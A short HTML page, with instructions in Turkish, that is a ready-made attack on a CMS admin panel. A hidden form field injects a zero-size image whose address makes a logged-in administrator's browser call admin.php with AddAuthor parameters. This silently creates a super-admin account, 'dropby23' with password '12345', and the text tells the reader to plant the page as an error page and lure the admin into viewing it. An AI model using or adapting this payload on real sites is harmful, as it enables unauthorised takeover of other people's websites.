<br><br><br>
<center>
<FORM action="http://www.sitebibadı.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=G od&add_pwd=12345&[email protected]&add_radmin s uper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz
kullanıcı adı dropby23 şifre 12345
</center>
<br><br><br>
</BODY>
</HTML>